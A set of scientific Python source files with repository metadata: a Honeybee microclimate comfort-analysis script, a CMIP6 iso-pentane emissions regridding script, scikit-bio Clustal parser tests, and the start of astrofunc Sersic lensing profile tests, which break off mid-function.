def writeCSVUTCI(lb_preparation, directory, fileName, radTempMtx, airTempMtx, UTCI_Mtx, OutdoorComfMtx, DegFromNeutralMtx):
    """Write the UTCI comfort result matrices to CSV files.

    Each matrix is a list whose first item is a header string and whose
    remaining items are per-hour lists of per-point values.  The radiant,
    air and UTCI files are skipped (result path = None) when the
    module-level writeResultFile_ input is 2; the outdoor-comfort and
    degrees-from-neutral files are always written.

    NOTE(review): the last two files are named "PPD.csv" and "PMV.csv" even
    though they hold UTCI outputs — this looks copy-pasted from writeCSVPMV,
    but the names are kept because downstream readers may depend on them;
    confirm before renaming.

    Returns:
        (radTempResult, airTempResult, UTCI_Result, OutdoorComfResult,
         DegFromNeutralResult) — full file paths, with None for any file
        that was skipped.
    """
    #Find out the number of values in each hour (index of the last column).
    valLen = len(radTempMtx[-1])-1
    #Set up a working directory.
    workingDir = lb_preparation.makeWorkingDir(os.path.join(directory))
    def _writeMtx(mtx, csvFileName):
        #Write one matrix to workingDir/csvFileName and return the full path.
        #Row 0 is the header string; data rows are comma-joined with a
        #trailing newline after the last column.
        filePath = os.path.join(workingDir, csvFileName)
        csvFile = open(filePath, 'wb')
        for lineCount, line in enumerate(mtx):
            if lineCount != 0:
                lineStr = ''
                for valCt, val in enumerate(line):
                    if valCt != valLen: lineStr = lineStr + str(val) + ','
                    else: lineStr = lineStr + str(val) + "\n"
                csvFile.write(lineStr)
            else: csvFile.write(line + "\n")
        csvFile.close()
        return filePath
    #Write the temperature/UTCI files unless the user asked for comfort results only.
    if writeResultFile_ != 2:
        radTempResult = _writeMtx(radTempMtx, fileName + "RadiantTemp.csv")
        airTempResult = _writeMtx(airTempMtx, fileName + "AirTemp.csv")
        UTCI_Result = _writeMtx(UTCI_Mtx, fileName + "UTCI.csv")
    else:
        radTempResult = None
        airTempResult = None
        UTCI_Result = None
    #The outdoor-comfort and degrees-from-neutral files are always written.
    OutdoorComfResult = _writeMtx(OutdoorComfMtx, fileName + "PPD.csv")
    DegFromNeutralResult = _writeMtx(DegFromNeutralMtx, fileName + "PMV.csv")
    return radTempResult, airTempResult, UTCI_Result, OutdoorComfResult, DegFromNeutralResult
#Import the classes, check the inputs, and generate default values for grid size if the user has given none.
# NOTE(review): this is the top-level driver of a Grasshopper (IronPython, Python 2)
# component. `sc`, `gh`, `ghenv`, `_comfAnalysisRecipe`, `_runIt` and
# `writeResultFile_` are injected by the Grasshopper environment, and the
# indentation below was reconstructed from context -- confirm against upstream.
checkLB = True
if sc.sticky.has_key('ladybug_release'):
    # Ladybug has been loaded: pull the shared helper classes out of the
    # document-wide sticky dictionary (each entry is a class; call to instantiate).
    lb_defaultFolder = sc.sticky["Ladybug_DefaultFolder"]
    lb_preparation = sc.sticky["ladybug_Preparation"]()
    lb_visualization = sc.sticky["ladybug_ResultVisualization"]()
    lb_sunpath = sc.sticky["ladybug_SunPath"]()
    lb_comfortModels = sc.sticky["ladybug_ComfortModels"]()
    lb_wind = sc.sticky["ladybug_WindSpeed"]()
else:
    # Ladybug is not loaded yet: warn the user on the component and bail out later.
    checkLB = False
    print "You should let the Ladybug fly first..."
    w = gh.GH_RuntimeMessageLevel.Warning
    ghenv.Component.AddRuntimeMessage(w, "You should let the Ladybug fly first...")

#Check the type of comfort analysis recipe connected.
# The recipe is a flat list: item 0 names the comfort model and the total
# length identifies the payload layout (53 = Adaptive, 56 = PMV, 51 = UTCI).
# The giant unpackings below rely on that exact ordering.
recipeRecognized = False
comfortModel = None
if len(_comfAnalysisRecipe) > 0:
    if len(_comfAnalysisRecipe) == 53 and _comfAnalysisRecipe[0] == "Adaptive":
        comfortModel, srfTempNumbers, srfTempHeaders, airTempDataNumbers, airTempDataHeaders, flowVolDataHeaders, flowVolDataNumbers, heatGainDataHeaders, heatGainDataNumbers, zoneSrfNames, testPtViewFactor, viewFactorMesh, latitude, longitude, timeZone, diffSolarRad, directSolarRad, globHorizRad, testPtSkyView, testPtBlockedVec, numSkyPatchDivs, winTrans, cloA, floorR, testPtZoneNames, testPtZoneWeights, ptHeightWeights, zoneInletInfo, inletHeightOverride, prevailingOutdoorTemp, ASHRAEorEN, comfClass, avgMonthOrRunMean, levelOfConditioning, mixedAirOverride, zoneHasWindows, outdoorClac, outSrfTempHeaders, outSrfTempNumbers, outdoorNonSrfViewFac, dataAnalysisPeriod, outWindSpeed, d, a, outdoorPtHeightWeights, allWindowShadesSame, winStatusHeaders, testPtBlockName, zoneWindowTransmiss, zoneWindowNames, allWindSpeedsSame, winSpeedNumbers, northAngle = _comfAnalysisRecipe
        recipeRecognized = True
    elif len(_comfAnalysisRecipe) == 56 and _comfAnalysisRecipe[0] == "PMV":
        comfortModel, srfTempNumbers, srfTempHeaders, airTempDataNumbers, airTempDataHeaders, flowVolDataHeaders, flowVolDataNumbers, heatGainDataHeaders, heatGainDataNumbers, relHumidDataHeaders, relHumidDataNumbers, clothingLevel, metabolicRate, zoneSrfNames, testPtViewFactor, viewFactorMesh, latitude, longitude, timeZone, diffSolarRad, directSolarRad, globHorizRad, testPtSkyView, testPtBlockedVec, numSkyPatchDivs, winTrans, cloA, floorR, testPtZoneNames, testPtZoneWeights, ptHeightWeights, zoneInletInfo, inletHeightOverride, PPDComfortThresh, humidRatioUp, humidRatioLow, mixedAirOverride, zoneHasWindows, outdoorClac, outSrfTempHeaders, outSrfTempNumbers, outdoorNonSrfViewFac, outDryBulbTemp, outRelHumid, outWindSpeed, d, a, outdoorPtHeightWeights, allWindowShadesSame, winStatusHeaders, testPtBlockName, zoneWindowTransmiss, zoneWindowNames, allWindSpeedsSame, winSpeedNumbers, dataAnalysisPeriod = _comfAnalysisRecipe
        recipeRecognized = True
    elif len(_comfAnalysisRecipe) == 51 and _comfAnalysisRecipe[0] == "UTCI":
        comfortModel, srfTempNumbers, srfTempHeaders, airTempDataNumbers, airTempDataHeaders, flowVolDataHeaders, flowVolDataNumbers, heatGainDataHeaders, heatGainDataNumbers, relHumidDataHeaders, relHumidDataNumbers, zoneSrfNames, testPtViewFactor, viewFactorMesh, latitude, longitude, timeZone, diffSolarRad, directSolarRad, globHorizRad, testPtSkyView, testPtBlockedVec, numSkyPatchDivs, winTrans, cloA, floorR, testPtZoneNames, testPtZoneWeights, ptHeightWeights, zoneInletInfo, inletHeightOverride, mixedAirOverride, zoneHasWindows, outdoorClac, outSrfTempHeaders, outSrfTempNumbers, outdoorNonSrfViewFac, outDryBulbTemp, outRelHumid, outWindSpeed, d, a, outdoorPtHeightWeights, allWindowShadesSame, winStatusHeaders, testPtBlockName, zoneWindowTransmiss, zoneWindowNames, allWindSpeedsSame, winSpeedNumbers, dataAnalysisPeriod = _comfAnalysisRecipe
        recipeRecognized = True
    else:
        warning = 'Comfort recipe not recognized.'
        print warning
        ghenv.Component.AddRuntimeMessage(gh.GH_RuntimeMessageLevel.Warning, warning)

#Manage the input and output.
manageOutput(comfortModel)

#Check the data input.
checkData = False
if recipeRecognized == True and checkLB == True:
    checkData, HOYs, analysisPeriod, fileName, directory = setDefaults(lb_defaultFolder, lb_preparation)
    # Only run the (expensive) analysis once the user toggles _runIt.
    # Each main* function returns -1 on failure, otherwise a 5-tuple of result
    # matrices that are optionally written to CSV (writeResultFile_ == 0 skips
    # writing entirely; == 2 skips the temperature files inside the writers).
    if checkData == True and _runIt == True:
        if comfortModel == "Adaptive":
            result = mainAdapt(HOYs, analysisPeriod, srfTempNumbers, srfTempHeaders, airTempDataNumbers, airTempDataHeaders, flowVolDataHeaders, flowVolDataNumbers, heatGainDataHeaders, heatGainDataNumbers, zoneSrfNames, testPtViewFactor, viewFactorMesh, latitude, longitude, timeZone, diffSolarRad, directSolarRad, globHorizRad, testPtSkyView, testPtBlockedVec, numSkyPatchDivs, winTrans, cloA, floorR, testPtZoneNames, testPtZoneWeights, ptHeightWeights, zoneInletInfo, inletHeightOverride, prevailingOutdoorTemp, ASHRAEorEN, comfClass, avgMonthOrRunMean, levelOfConditioning, mixedAirOverride, zoneHasWindows, outdoorClac, outSrfTempHeaders, outSrfTempNumbers, outdoorNonSrfViewFac, dataAnalysisPeriod, outWindSpeed, d, a, outdoorPtHeightWeights, allWindowShadesSame, winStatusHeaders, testPtBlockName, zoneWindowTransmiss, zoneWindowNames, allWindSpeedsSame, winSpeedNumbers, northAngle, lb_preparation, lb_sunpath, lb_comfortModels, lb_wind)
            if result != -1:
                radTempMtx, airTempMtx, operativeTempMtx, adaptComfMtx, degFromTargetMtx = result
                if writeResultFile_ != 0:
                    radTempResult, airTempResult, operativeTempResult, adaptComfResult, degFromTargetResult = writeCSVAdapt(lb_preparation, directory, fileName, radTempMtx, airTempMtx, operativeTempMtx, adaptComfMtx, degFromTargetMtx)
        elif comfortModel == "PMV":
            result = mainPMV(HOYs, analysisPeriod, srfTempNumbers, srfTempHeaders, airTempDataNumbers, airTempDataHeaders, flowVolDataHeaders, flowVolDataNumbers, heatGainDataHeaders, heatGainDataNumbers, relHumidDataHeaders, relHumidDataNumbers, clothingLevel, metabolicRate, zoneSrfNames, testPtViewFactor, viewFactorMesh, latitude, longitude, timeZone, diffSolarRad, directSolarRad, globHorizRad, testPtSkyView, testPtBlockedVec, numSkyPatchDivs, winTrans, cloA, floorR, testPtZoneNames, testPtZoneWeights, ptHeightWeights, zoneInletInfo, inletHeightOverride, PPDComfortThresh, humidRatioUp, humidRatioLow, mixedAirOverride, zoneHasWindows, outdoorClac, outSrfTempHeaders, outSrfTempNumbers, outdoorNonSrfViewFac, outDryBulbTemp, outRelHumid, outWindSpeed, d, a, outdoorPtHeightWeights, allWindowShadesSame, winStatusHeaders, testPtBlockName, zoneWindowTransmiss, zoneWindowNames, allWindSpeedsSame, winSpeedNumbers, dataAnalysisPeriod, lb_preparation, lb_sunpath, lb_comfortModels, lb_wind)
            if result != -1:
                radTempMtx, airTempMtx, SET_Mtx, PMVComfMtx, PMV_Mtx = result
                if writeResultFile_ != 0:
                    radTempResult, airTempResult, SET_Result, PMVComfResult, PMV_Result = writeCSVPMV(lb_preparation, directory, fileName, radTempMtx, airTempMtx, SET_Mtx, PMVComfMtx, PMV_Mtx)
        elif comfortModel == "UTCI":
            result = mainUTCI(HOYs, analysisPeriod, srfTempNumbers, srfTempHeaders, airTempDataNumbers, airTempDataHeaders, flowVolDataHeaders, flowVolDataNumbers, heatGainDataHeaders, heatGainDataNumbers, relHumidDataHeaders, relHumidDataNumbers, zoneSrfNames, testPtViewFactor, viewFactorMesh, latitude, longitude, timeZone, diffSolarRad, directSolarRad, globHorizRad, testPtSkyView, testPtBlockedVec, numSkyPatchDivs, winTrans, cloA, floorR, testPtZoneNames, testPtZoneWeights, ptHeightWeights, zoneInletInfo, inletHeightOverride, mixedAirOverride, zoneHasWindows, outdoorClac, outSrfTempHeaders, outSrfTempNumbers, outdoorNonSrfViewFac, outDryBulbTemp, outRelHumid, outWindSpeed, d, a, outdoorPtHeightWeights, allWindowShadesSame, winStatusHeaders, testPtBlockName, zoneWindowTransmiss, zoneWindowNames, allWindSpeedsSame, winSpeedNumbers, dataAnalysisPeriod, lb_preparation, lb_sunpath, lb_comfortModels, lb_wind)
            if result != -1:
                radTempMtx, airTempMtx, UTCI_Mtx, OutdoorComfMtx, DegFromNeutralMtx = result
                if writeResultFile_ != 0:
                    radTempResult, airTempResult, UTCI_Result, OutdoorComfResult, DegFromNeutralResult = writeCSVUTCI(lb_preparation, directory, fileName, radTempMtx, airTempMtx, UTCI_Mtx, OutdoorComfMtx, DegFromNeutralMtx)
|
samuto/Honeybee
|
src/Honeybee_Microclimate Map Analysis.py
|
Python
|
gpl-3.0
| 100,915
|
[
"EPW"
] |
0659d2e1970f1ac97fd1c76b3d513886d2993466bb246cbd935b2fc1a0e5fdb2
|
#!/usr/bin/env python
##############################################################################################
#
#
#  CMIP6_hybrid_regrid_emissions_N96e.py
#
#  Regrid CMIP6 hybrid iso-pentane surface emissions onto the N96e (ENDGame)
#  grid and write a UM-ready emissions ancillary netCDF file on a 360_day
#  calendar (monthly values, 1960-01 .. 2020-12).
#
#  Requirements:
#  Iris 1.10, time, cf_units, numpy
#
#
#  This Python script has been written by N.L. Abraham as part of the UKCA Tutorials:
#   http://www.ukca.ac.uk/wiki/index.php/UKCA_Chemistry_and_Aerosol_Tutorials_at_vn10.4
#
#  Copyright (C) 2015  University of Cambridge
#
#  This is free software: you can redistribute it and/or modify it under the
#  terms of the GNU Lesser General Public License as published by the Free Software
#  Foundation, either version 3 of the License, or (at your option) any later
#  version.
#
#  It is distributed in the hope that it will be useful, but WITHOUT ANY
#  WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
#  PARTICULAR PURPOSE.  See the GNU Lesser General Public License for more details.
#
#  You find a copy of the GNU Lesser General Public License at <http://www.gnu.org/licenses/>.
#
#  Written by N. Luke Abraham 2016-10-20 <nla27@cam.ac.uk>
#  Modified by Marcus Koehler 2017-10-11 <mok21@cam.ac.uk>
#
#
##############################################################################################

# preamble
import time
import iris
import cf_units
import numpy

# --- CHANGE THINGS BELOW THIS LINE TO WORK WITH YOUR FILES ETC. ---

# name of file containing an ENDGame grid, e.g. your model output
# NOTE: all the fields in the file should be on the same horizontal
#       grid, as the field used MAY NOT be the first in order of STASH
grid_file='/group_workspaces/jasmin2/ukca/vol1/mkoehler/um/archer/ag542/apm.pp/ag542a.pm1988dec'
#
# name of emissions file
# NOTE: We use the fluxes from the Gregorian calendar file also for the 360_day emission files
emissions_file='/group_workspaces/jasmin2/ukca/vol1/mkoehler/emissions/OXBUDS/0.5x0.5/cmip6_hybrid/v2/CMIP6_hybrid_combined_iso-pentane_1960-2020_v2_greg.nc'

# --- BELOW THIS LINE, NOTHING SHOULD NEED TO BE CHANGED ---

species_name='i-C5H12'

# Mid-month time points on the 360_day calendar, 1960-Jan .. 2020-Dec:
# day 15, 45, 75, ..., 21945 -- i.e. 61 years x 12 months = 732 monthly values
# with a constant 30-day spacing.  Computed once here instead of hard-coding
# 732 literals twice (time points and forecast_reference_time), so the two
# coordinates can never drift apart.
n_months = 732  # 61 years * 12 months
mid_month_days = 15.0 + 30.0*numpy.arange(n_months, dtype='float64')

# this is the grid we want to regrid to, e.g. N96 ENDGame
grd=iris.load(grid_file)[0]
grd.coord(axis='x').guess_bounds()
grd.coord(axis='y').guess_bounds()

# This is the original data
ems=iris.load_cube(emissions_file)

# make intersection between 0 and 360 longitude to ensure that
# the data is regridded correctly
nems = ems.intersection(longitude=(0, 360))

# make sure that we use the same coordinate system, otherwise regrid won't work
nems.coord(axis='x').coord_system=grd.coord_system()
nems.coord(axis='y').coord_system=grd.coord_system()

# now guess the bounds of the new grid prior to regridding
nems.coord(axis='x').guess_bounds()
nems.coord(axis='y').guess_bounds()

# now regrid -- area-weighted regridding conserves the emitted flux
ocube=nems.regrid(grd,iris.analysis.AreaWeighted())

# now add correct attributes and names to netCDF file
ocube.var_name='emissions_'+species_name.strip()
ocube.long_name='iso-pentane surface emissions'
ocube.units=cf_units.Unit('kg m-2 s-1')
ocube.attributes['vertical_scaling']='surface'
ocube.attributes['tracer_name']=species_name.strip()

# global attributes, so don't set in local_keys
# NOTE: all these should be strings, including the numbers!
# basic emissions type
ocube.attributes['emission_type']='1' # time series
ocube.attributes['update_type']='1'   # same as above
ocube.attributes['update_freq_in_hours']='120' # i.e. 5 days
ocube.attributes['um_version']='10.6' # UM version
ocube.attributes['source']='CMIP6_hybrid_combined_iso-pentane_1960-2020_v2_greg.nc'
ocube.attributes['title']='Time-varying monthly surface emissions of iso-pentane from 1960 to 2020.'
ocube.attributes['File_version']='CMIP6_hybrid_v2'
ocube.attributes['File_creation_date']=time.ctime(time.time())
ocube.attributes['grid']='regular 1.875 x 1.25 degree longitude-latitude grid (N96e)'
ocube.attributes['history']=time.ctime(time.time())+': '+__file__+' \n'+ocube.attributes['history']
ocube.attributes['institution']='Centre for Atmospheric Science, Department of Chemistry, University of Cambridge, U.K.'
ocube.attributes['reference']='Hoesly et al., Geosci. Mod. Dev., 2018; Granier et al., Clim. Change, 2011; Lamarque et al., Atmos. Chem. Phys., 2010; Helmig et al., Atmos. Environ., 2014.'

# drop attributes inherited from the source emissions file that no longer apply
# NOTE(review): raises KeyError if the source file lacks them -- same as original
del ocube.attributes['file_creation_date']
del ocube.attributes['description']

# rename and set time coord - mid-month from 1960-Jan to 2020-Dec
ocube.coord(axis='t').var_name='time'
ocube.coord(axis='t').standard_name='time'
ocube.coords(axis='t')[0].units=cf_units.Unit('days since 1960-01-01 00:00:00', calendar='360_day')
ocube.coord(axis='t').points=mid_month_days.copy()

# make z-direction.
zdims=iris.coords.DimCoord(numpy.array([0]),standard_name = 'model_level_number',
                           units='1',attributes={'positive':'up'})
ocube.add_aux_coord(zdims)
ocube=iris.util.new_axis(ocube, zdims)
# now transpose cube to put Z 2nd
ocube.transpose([1,0,2,3])

# make coordinates 64-bit
ocube.coord(axis='x').points=ocube.coord(axis='x').points.astype(dtype='float64')
ocube.coord(axis='y').points=ocube.coord(axis='y').points.astype(dtype='float64')
#ocube.coord(axis='z').points=ocube.coord(axis='z').points.astype(dtype='float64') # integer
ocube.coord(axis='t').points=ocube.coord(axis='t').points.astype(dtype='float64')
# for some reason, longitude_bounds are double, but latitude_bounds are float
ocube.coord('latitude').bounds=ocube.coord('latitude').bounds.astype(dtype='float64')

# add forecast_period & forecast_reference_time
# forecast_reference_time: identical mid-month points as the time coordinate
frt=mid_month_days.copy()
frt_dims=iris.coords.AuxCoord(frt,standard_name = 'forecast_reference_time',
                              units=cf_units.Unit('days since 1960-01-01 00:00:00', calendar='360_day'))
ocube.add_aux_coord(frt_dims,data_dims=0)
ocube.coord('forecast_reference_time').guess_bounds()
# forecast_period
fp=numpy.array([-360],dtype='float64')
fp_dims=iris.coords.AuxCoord(fp,standard_name = 'forecast_period',
                             units=cf_units.Unit('hours'),bounds=numpy.array([-720,0],dtype='float64'))
ocube.add_aux_coord(fp_dims,data_dims=None)

# add-in cell_methods
ocube.cell_methods = [iris.coords.CellMethod('mean', 'time')]
# set _FillValue
fillval=1e+20
ocube.data = numpy.ma.array(data=ocube.data, fill_value=fillval, dtype='float32')

# output file name, based on species
outpath='ukca_emiss_iC5H12.nc'

# don't want time to be cattable, as is a periodic emissions file
iris.FUTURE.netcdf_no_unlimited=True

# annoying hack to set a missing_value attribute as well as a _FillValue attribute
dict.__setitem__(ocube.attributes, 'missing_value', fillval)

# now write-out to netCDF
saver = iris.fileformats.netcdf.Saver(filename=outpath, netcdf_format='NETCDF3_CLASSIC')
saver.update_global_attributes(Conventions=iris.fileformats.netcdf.CF_CONVENTIONS_VERSION)
saver.write(ocube, local_keys=['vertical_scaling', 'missing_value','um_stash_source','tracer_name'])

# end of script
|
acsis-project/emissions
|
emissions/python/CMIP6_hybrid/CMIP6_hybrid_regrid_iC5H12_emissions_n96e_360d.py
|
Python
|
gpl-3.0
| 17,171
|
[
"NetCDF"
] |
8ce5924394ea3f6b76cc485af46446bafcef7c9d3df8a8c0be292ac17b0b8f70
|
#!/usr/bin/env python
# -----------------------------------------------------------------------------
# Copyright (c) 2013--, scikit-bio development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
# -----------------------------------------------------------------------------
from __future__ import division
from skbio.parse.sequences.clustal import (_is_clustal_seq_line, last_space,
_delete_trailing_number,
parse_clustal)
from skbio.core.exception import RecordError
from unittest import TestCase, main
class ClustalTests(TestCase):
    """Tests of top-level functions."""
    # NOTE(review): whitespace inside some string literals below appears to have
    # been collapsed in transit (e.g. the last_space expectations) -- verify
    # against the upstream scikit-bio sources before relying on exact bytes.

    def test_is_clustal_seq_line(self):
        """_is_clustal_seq_line should reject blanks and 'CLUSTAL'"""
        ic = _is_clustal_seq_line
        # plain sequence lines are accepted
        assert ic('abc')
        assert ic('abc def')
        # headers, conservation lines and space-led lines are rejected
        assert ic('CLUSTAL') == False
        assert ic('CLUSTAL W fsdhicjkjsdk') == False
        assert ic(' * *') == False
        assert ic(' abc def') == False
        assert ic('MUSCLE (3.41) multiple sequence alignment') == False

    def test_last_space(self):
        """last_space should split on last whitespace"""
        self.assertEqual(last_space('a\t\t\t b c'), ['a b', 'c'])
        # no whitespace at all: whole string comes back as a single item
        self.assertEqual(last_space('xyz'), ['xyz'])
        # leading whitespace is ignored when locating the split point
        self.assertEqual(last_space(' a b'), ['a', 'b'])

    def test_delete_trailing_number(self):
        """Should delete the trailing number if present"""
        dtn = _delete_trailing_number
        # strings without a trailing number field are returned unchanged
        self.assertEqual(dtn('abc'), 'abc')
        self.assertEqual(dtn('a b c'), 'a b c')
        self.assertEqual(dtn('a \t  b  \t  c'), 'a \t  b  \t  c')
        # only the final whitespace-separated numeric field is stripped
        self.assertEqual(dtn('a b 3'), 'a b')
        self.assertEqual(dtn('a b c \t 345'), 'a b c')
class ClustalParserTests(TestCase):
    """Tests of the parse_clustal function"""
    # Fixtures (MINIMAL, TWO, REAL, BAD, SPACE_LABELS) are defined at module
    # level below; parse_clustal yields (label, sequence) pairs, so results
    # are wrapped in dict() for comparison.

    def test_null(self):
        """Should return empty dict and list on null input"""
        result = parse_clustal([])
        self.assertEqual(dict(result), {})

    def test_minimal(self):
        """Should handle single-line input correctly"""
        result = parse_clustal([MINIMAL]) # expects seq of lines
        self.assertEqual(dict(result), {'abc': 'ucag'})

    def test_two(self):
        """Should handle two-sequence input correctly"""
        # sequences split across blocks are concatenated per label
        result = parse_clustal(TWO)
        self.assertEqual(dict(result), {'abc': 'uuuaaa', 'def': 'cccggg'})

    def test_real(self):
        """Should handle real Clustal output"""
        data = parse_clustal(REAL)
        # each label's 60-column blocks are joined; gaps ('-') are preserved
        self.assertEqual(dict(data), {
            'abc':
            'GCAUGCAUGCAUGAUCGUACGUCAGCAUGCUAGACUGCAUACGUACGUACGCAUGCAUCA'
            'GUCGAUACGUACGUCAGUCAGUACGUCAGCAUGCAUACGUACGUCGUACGUACGU-CGAC'
            'UGACUAGUCAGCUAGCAUCGAUCAGU',
            'def':
            '------------------------------------------------------------'
            '-----------------------------------------CGCGAUGCAUGCAU-CGAU'
            'CGAUCAGUCAGUCGAU----------',
            'xyz':
            '------------------------------------------------------------'
            '-------------------------------------CAUGCAUCGUACGUACGCAUGAC'
            'UGCUGCAUCA----------------'
        })

    def test_bad(self):
        """Should reject bad data if strict"""
        # non-strict mode silently yields nothing for unparseable input
        result = parse_clustal(BAD, strict=False)
        self.assertEqual(dict(result), {})
        # should fail unless we turned strict processing off
        with self.assertRaises(RecordError):
            dict(parse_clustal(BAD))

    def test_space_labels(self):
        """Should tolerate spaces in labels"""
        # the label is everything before the LAST whitespace run
        result = parse_clustal(SPACE_LABELS)
        self.assertEqual(dict(result), {'abc': 'uca', 'def ggg': 'ccc'})
# --- test fixtures -----------------------------------------------------------
# MINIMAL: a single tab-separated label/sequence line.
MINIMAL = 'abc\tucag'
# TWO: two labels split across two blocks, with a conservation line and a
# stray 'def ggg' line in between; blocks per label get concatenated.
TWO = 'abc\tuuu\ndef\tccc\n\n    ***\n\ndef ggg\nabc\taaa\n'.split('\n')
# REAL: genuine CLUSTAL W output with three sequences over three blocks.
# NOTE(review): conservation lines (runs of '*') and alignment columns normally
# carry leading whitespace in Clustal output; it may have been stripped when
# this file was extracted -- verify against upstream scikit-bio.
REAL = """CLUSTAL W (1.82) multiple sequence alignment
abc GCAUGCAUGCAUGAUCGUACGUCAGCAUGCUAGACUGCAUACGUACGUACGCAUGCAUCA 60
def ------------------------------------------------------------
xyz ------------------------------------------------------------
abc GUCGAUACGUACGUCAGUCAGUACGUCAGCAUGCAUACGUACGUCGUACGUACGU-CGAC 11
def -----------------------------------------CGCGAUGCAUGCAU-CGAU 18
xyz -------------------------------------CAUGCAUCGUACGUACGCAUGAC 23
* * * * * **
abc UGACUAGUCAGCUAGCAUCGAUCAGU 145
def CGAUCAGUCAGUCGAU---------- 34
xyz UGCUGCAUCA---------------- 33
* ***""".split('\n')
# BAD: lines that are not valid Clustal records at all.
BAD = ['dshfjsdfhdfsj', 'hfsdjksdfhjsdf']
# SPACE_LABELS: labels containing internal spaces.
SPACE_LABELS = ['abc uca', 'def ggg ccc']

# run the tests when the module is executed directly
if __name__ == '__main__':
    main()
|
Jorge-C/bipy
|
skbio/parse/sequences/tests/test_clustal.py
|
Python
|
bsd-3-clause
| 4,820
|
[
"scikit-bio"
] |
5f60e2a377746191144a425d7fe2f07eec7d5b69e8ef353def9b06c4da15cab1
|
__author__ = 'sibirrer'
import astrofunc.LensingProfiles.calc_util as calc_util
from astrofunc.LensingProfiles.sersic import Sersic
from astrofunc.LightProfiles.sersic import Sersic as Sersic_light
import numpy as np
import pytest
import numpy.testing as npt
class TestSersic(object):
    """
    tests the Gaussian methods
    """
    # NOTE(review): despite the docstring above, this class exercises the
    # Sersic *lens* profile against the Sersic *light* profile; the expected
    # numbers are regression values, not analytically-derived results.

    def setup(self):
        # pytest calls setup() before every test: fresh profile instances each time
        self.sersic = Sersic()
        self.sersic_light = Sersic_light()

    def test_function(self):
        # lensing potential evaluated at scalar points and arrays of points
        x = 1
        y = 2
        n_sersic = 2.
        r_eff = 1.
        k_eff = 0.2
        values = self.sersic.function(x, y, n_sersic, r_eff, k_eff)
        npt.assert_almost_equal(values, 1.0272982586319199, decimal=10)
        x = np.array([0])
        y = np.array([0])
        values = self.sersic.function(x, y, n_sersic, r_eff, k_eff)
        # potential is zero at the origin
        npt.assert_almost_equal(values[0], 0., decimal=10)
        x = np.array([2,3,4])
        y = np.array([1,1,1])
        values = self.sersic.function(x, y, n_sersic, r_eff, k_eff)
        npt.assert_almost_equal(values[0], 1.0272982586319199, decimal=10)
        npt.assert_almost_equal(values[1], 1.3318743892966658, decimal=10)
        npt.assert_almost_equal(values[2], 1.584299393114988, decimal=10)

    def test_derivatives(self):
        # deflection angles (gradient of the potential) for arrays of points
        x = np.array([1])
        y = np.array([2])
        n_sersic = 2.
        r_eff = 1.
        k_eff = 0.2
        f_x, f_y = self.sersic.derivatives(x, y, n_sersic, r_eff, k_eff)
        assert f_x[0] == 0.16556078301997193
        assert f_y[0] == 0.33112156603994386
        x = np.array([0])
        y = np.array([0])
        f_x, f_y = self.sersic.derivatives(x, y, n_sersic, r_eff, k_eff)
        # deflection vanishes at the origin by symmetry
        assert f_x[0] == 0
        assert f_y[0] == 0
        x = np.array([1,3,4])
        y = np.array([2,1,1])
        values = self.sersic.derivatives(x, y, n_sersic, r_eff, k_eff)
        assert values[0][0] == 0.16556078301997193
        assert values[1][0] == 0.33112156603994386
        assert values[0][1] == 0.2772992378623737
        assert values[1][1] == 0.092433079287457892

    def test_differentails(self):
        # cross-checks two algebraically equivalent chain-rule compositions of
        # the second derivatives built from d_alpha_dr and alpha_abs
        x_, y_ = 1., 1
        n_sersic = 2.
        r_eff = 1.
        k_eff = 0.2
        r = np.sqrt(x_**2 + y_**2)
        d_alpha_dr = self.sersic.d_alpha_dr(x_, y_, n_sersic, r_eff, k_eff)
        alpha = self.sersic.alpha_abs(x_, y_, n_sersic, r_eff, k_eff)
        # form 1: via the calc_util helper derivatives
        f_xx_ = d_alpha_dr * calc_util.d_r_dx(x_, y_) * x_/r + alpha * calc_util.d_x_diffr_dx(x_, y_)
        f_yy_ = d_alpha_dr * calc_util.d_r_dy(x_, y_) * y_/r + alpha * calc_util.d_y_diffr_dy(x_, y_)
        f_xy_ = d_alpha_dr * calc_util.d_r_dy(x_, y_) * x_/r + alpha * calc_util.d_x_diffr_dy(x_, y_)
        # form 2: expanded explicitly in r, x_, y_
        f_xx = (d_alpha_dr/r - alpha/r**2) * y_**2/r + alpha/r
        f_yy = (d_alpha_dr/r - alpha/r**2) * x_**2/r + alpha/r
        f_xy = (d_alpha_dr/r - alpha/r**2) * x_*y_/r
        npt.assert_almost_equal(f_xx, f_xx_, decimal=10)
        npt.assert_almost_equal(f_yy, f_yy_, decimal=10)
        npt.assert_almost_equal(f_xy, f_xy_, decimal=10)

    def test_hessian(self):
        # second derivatives of the potential (f_xx, f_yy, f_xy)
        x = np.array([1])
        y = np.array([2])
        n_sersic = 2.
        r_eff = 1.
        k_eff = 0.2
        f_xx, f_yy,f_xy = self.sersic.hessian(x, y, n_sersic, r_eff, k_eff)
        assert f_xx[0] == 0.1123170666045793
        npt.assert_almost_equal(f_yy[0], -0.047414082641598576, decimal=10)
        npt.assert_almost_equal(f_xy[0], -0.10648743283078525 , decimal=10)
        x = np.array([1,3,4])
        y = np.array([2,1,1])
        values = self.sersic.hessian(x, y, n_sersic, r_eff, k_eff)
        assert values[0][0] == 0.1123170666045793
        npt.assert_almost_equal(values[1][0], -0.047414082641598576, decimal=10)
        npt.assert_almost_equal(values[2][0], -0.10648743283078525 , decimal=10)
        npt.assert_almost_equal(values[0][1], -0.053273787681591328, decimal=10)
        npt.assert_almost_equal(values[1][1], 0.076243427402007985, decimal=10)
        npt.assert_almost_equal(values[2][1], -0.048568955656349749, decimal=10)

    def test_alpha_abs(self):
        # alpha_abs should match the negative finite-difference slope of the
        # potential along the x-axis (decimal=3 because of the finite step dr)
        x = 1.
        dr = 0.0000001
        n_sersic = 2.5
        r_eff = .5
        k_eff = 0.2
        alpha_abs = self.sersic.alpha_abs(x, 0, n_sersic, r_eff, k_eff)
        f_dr = self.sersic.function(x + dr, 0, n_sersic, r_eff, k_eff)
        f_ = self.sersic.function(x, 0, n_sersic, r_eff, k_eff)
        alpha_abs_num = -(f_dr - f_)/dr
        npt.assert_almost_equal(alpha_abs_num, alpha_abs, decimal=3)

    def test_dalpha_dr(self):
        # d_alpha_dr should match the finite-difference slope of alpha_abs
        x = 1.
        dr = 0.0000001
        n_sersic = 1.
        r_eff = .5
        k_eff = 0.2
